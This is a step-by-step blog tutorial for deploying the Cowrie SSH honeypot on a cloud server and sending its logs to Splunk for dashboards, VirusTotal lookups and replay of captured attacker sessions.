Learn how to deploy a Honeypot and visualise its data step by step

Detailed instructions on how to deploy the Cowrie honeypot monitored by Splunk.

Image for post
Image for post
The Manuka Honeypot — Keep reading and you’ll have this running in no time!

If you want to observe live and real threat intelligence the best way is probably by deploying a Honeypot.

Here are some step by step instructions that are fully working at the time of writing this article and that should have you gathering data in 30 minutes.

Disclaimer: As of May 2019 there are already many tools out there automating all this process (the Modern Honey Network is a famous one), however most of those tools’ development has been abandoned and the scripts that automate all the process don’t work anymore (dependencies, Python 3, and all that black magic), hence the step by step process. (plus you will get to understand how the tools work).

0. What are we going to deploy:

Two devices on the cloud:

Device 1: Runs the Cowrie honeypot, registers all the data, then sends its logs.

Device 2: Runs Splunk Free, collects logs, and prints out cool graphs.

These devices will be deployed in DigitalOcean cloud because:

  1. There’s a free $100 credit! (if you’re considering running this experiment use my referral link 🙂)
  2. I am not setting a honeypot anywhere near any of my networks.

*Note: Google Cloud also provides free credit at this time.

1. Installing and tweaking Cowrie:

Start by deploying onto Digital Ocean a basic $5 a month Droplet with 1GB of RAM / 1 CPU— I found Ubuntu 18.10 x64 worked well:

Image for post
Image for post

You will receive an email with the user/password to SSH into it immediately.

-Remember to change your terminal settings to the Matrix colour scheme for extra hacking skills-

I will follow the steps detailed in the Cowrie project’s GitHub page but here’s some easy copy pasting assistance:

sudo apt-get update
sudo apt-get install git python-virtualenv libssl-dev libffi-dev build-essential libpython3-dev python3-minimal authbind

Then add a Cowrie user and switch to it. We can’t (and really don’t want) to run Cowrie as root:

sudo adduser --disabled-password cowrie
sudo su - cowrie

Download Cowrie’s code:

git clone http://github.com/cowrie/cowrie

Set up the virtual environment for the Honeypot (fake OS):

cd /home/cowrie/cowrie
virtualenv --python=python3 cowrie-env
source cowrie-env/bin/activate
(cowrie-env) $ pip install --upgrade pip
(cowrie-env) $ pip install --upgrade -r requirements.txt

Locate the cowrie.cfg.dist file and copy it onto the same file but named cowrie.cfg, that is the one we will edit.

cp /home/cowrie/cowrie/etc/cowrie.cfg.dist /home/cowrie/cowrie/etc/cowrie.cfg

This is the configuration file for Cowrie, if you want to enable Telnet, make change the hostname of the server (so it does not look like the generic Cowrie honeypot), and so and so… we will do the changes here.

For example let’s do a hostname change: edit the line hostname. Easy. Most fields are self explanatory, change the line hostname to look like this:

hostname = UbuntuServer4

To have the Honeypot listening on port 22 (by default the Honeypot listens on 2222 which will make us miss a lot of stuff) we have to do a few changes:

On the cowrie.cfg file:

listen_endpoints = tcp:22:interface=0.0.0.0

Note: Cowrie needs a restart every time you make changes in the config file.

Then run these commands so a non-root user can listen on port 22 (blocked by default and we can’t run Cowrie as root so this will be necessary):

sudo apt-get install authbind
sudo touch /etc/authbind/byport/22
sudo chown cowrie:cowrie /etc/authbind/byport/22
sudo chmod 770 /etc/authbind/byport/22

Then edit the file /etc/ssh/sshd_config, modify the port line to make your honeypot true SSH port listen on a random port (dont pick 2222 come on!) and perform a ssh service restart:

vim /etc/ssh/sshd_config  //Uncomment port line and change numberservice ssh restart

Finally: Set up Cowrie under supervisord so you can daemonize it:

apt install supervisorcat > /etc/supervisor/conf.d/cowrie.conf <<EOF[program:cowrie]command=/opt/cowrie/bin/cowrie startdirectory=/opt/cowriestdout_logfile=/opt/cowrie/var/log/cowrie/cowrie.outstderr_logfile=/opt/cowrie/var/log/cowrie/cowrie.errautostart=trueautorestart=truestopasgroup=truekillasgroup=trueuser=cowrieEOFsupervisorctl update

Troubleshoot now if it has been daemonized correctly:

root@Cowrie:~# supervisorctl
cowrie RUNNING pid 1007, uptime 0:16:44

Nice.

Also check netstat to verify the correct process is listening in every port:

root@Cowrie:~# netstat -tanpl
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:32328 0.0.0.0:* LISTEN 922/sshd
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN 639/systemd-resolve
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN 1007/python3

Nice.

Python listening on port 22 is the fake system and sshd on the one for our true SSH (you can always use the DigitalOcean console if you lock yourself out).

Took a lot of copy pasting to get here but think about all the… L E A R N I N G

BONUS STEPS:

1. Do the following to edit the users that can access the Honeypot:

First copy userdb.example to the .txt file so we can edit

cp /home/cowrie/cowrie/etc/userdb.example /home/cowrie/cowrie/etc/userdb.txt

Then edit the file accordingly to the comments in it.

Protip: Make the honeypot more interesting for attackers by limiting the logins that can get in.

Protip2: Allow everything to study botnet campaign attacks.

2. Integration with VirusTotal:

Go to VirusTotal and create a free account, you will receive an API key.

Go to the cowrie.cfg file and uncomment the VirusTotal section:

[output_virustotal]
enabled = true
api_key = ***paste here your API KEY***
upload = True
debug = False
scan_file = True
scan_url = True

It is a great idea to take a snapshot for $0.05 a month — beats repeating all of the above :)

2. Deploying Splunk:

To deploy Splunk we’re going to need a new Droplet (Hey you could do everything in a single Droplet but this makes it more scalable, i.e. you can deploy more honeypots and link them back to Splunk).

In this case I use a slightly bigger Droplet:

Image for post
Image for post

Create an account on Splunk and download the Free version (free up until 500MB a day of traffic, which hopefully you won’t receive yet!).

Image for post
Image for post
Click on the Dowload via Command Line (wget) to simplify things

Download the Linux version in .tgz and you will see a Command Line download option to download via wget

cd /opt/
wget -O splunk-7.2..
tar -zxvf splunk-7.2...
cd /opt/splunk/bin/
./splunk start

Set up a user/pwd and then access the GUI by going onto http://WhateverYourSplunkIpIs:8000

3. Connect Cowrie to Splunk

Image for post
Image for post
Hi, I have no idea of how Splunk works and welcome to Jackass.

To connect Cowrie the blog from Splunk explains it pretty well here. In summary:

Go to Splunk, on the top menu click on:

Settings> Add Data

Create a HTTP Event Collector, under Monitor, leave everything as automatic and copy the Token you will obtain.

Image for post
Image for post

In the honeypot Droplet, go to your cowrie.cfg file and uncomment the output_splunk section:

[output_splunk]
enabled = true
url = https://localhost:8088/services/collector/event
token = xxxxxxxxxxxxxx
index = cowrie
sourcetype = cowrie
source = cowrie

Then fill the token and url with the information you will obtain from Splunk.

URL is the public IP of the second Droplet and you obtain Token by deploying a new data collector on Splunk:

Settings> Add Data > Monitor > HTTP Event Collector.

Leave everything as automatic and copy the Token you will obtain

Then restart Cowrie and it will start sending logs.

Inside Splunk Go to Data>Indexes and create a new Index, just change the name to “cowrie”.

Edit under Data>Data inputs the HTTP collector so everything is sent to the index “cowrie”.

Go back to Data>Indexes and verify that Cowrie is sending events, you will see that the Index “cowrie” has some recent latest events

If it doesn’t, well, shit.

4. Start looking at the fancy graphs:

Go to the top left of Splunk and click on Apps>Manage Apps

Then select Install app from file and install the Manuka Honeypot:

Manuka HoneyPot.tgz

This is a Splunk App that I created specifically for Cowrie .

There are many Apps out there (MHN, Tango, EngagedThreat…) but as of 2019 all are mostly outdated due to what I mentioned on the first disclaimer.

Leave the honeypot running for a few hours (or minutes to be fair) and you will start seeing results.

Now this is the cool part. Splunk is kind of Excel on steroids when it comes to graphs.

Some of the dashboards you will see are:

Image for post
Image for post
First an overview
Image for post
Image for post
A bit more detail on who and what are they doing
Image for post
Image for post
Keep an eye out for the username “mother” (sadly not in the picture)
Image for post
Image for post
VirusTotal submission results

5. Replay CLI recordings:

Terminal recordings are stored in the /cowrie/tty folder (in the Cowrie machine!)

You can go to the TTY directory and see if there’s any recordings

/home/cowrie/cowrie/var/lib/cowrie/tty

cd /home/cowrie/cowrie/var/lib/cowrie/tty//home/cowrie/cowrie/var/lib/cowrie/tty# ls -la
total 28
drwxrwxr-x 2 cowrie cowrie 4096 May 8 06:35 .
drwxrwxr-x 4 cowrie cowrie 4096 May 7 04:28 ..
-rw-rw-r-- 1 cowrie cowrie 2 May 7 03:38 .gitignore
-rw-r--r-- 1 cowrie cowrie 4750 May 8 05:52 22cd32d7e0061023a685158d46903d35c8369d9f1c158daadddc0ca2b3129ba3
-rw-r--r-- 1 cowrie cowrie 432 May 7 05:02 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
-rw-r--r-- 1 cowrie cowrie 2222 May 8 05:45 f4518faf335e77750bc7a61d3e9c0df3c0740c62540259417fec9c067bd2f070

There’s a few!

Then go to the bin directory:

/home/cowrie/cowrie/bin

and run playlog with pointing to the files in the TTY directory listing the full path:

./playlog /home/cowrie/cowrie/var/lib/cowrie/tty/22cd32d7e0061023a685158d46903d35c8369d9f1c158daadddc0ca2b3129ba3

There’s a dashboard that lists all recent TTY captured activity and make’s things a bit easier:

Image for post
Image for post

6. Bonus:

Try a few things, for example, modify userdb.txt so it allows a lot of passwords .

You allow all passwords for a user by configuring it like this:

admin:x:*

If you followed every instruction step by step, and the Ubuntu images on DigitalOcean or the Cowrie project haven’t changed too much since May 2019 this should be working flawlessly.

Happy hunting and looking forward to any feedback on this!

Cybersecurity experiments. Simplified.

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store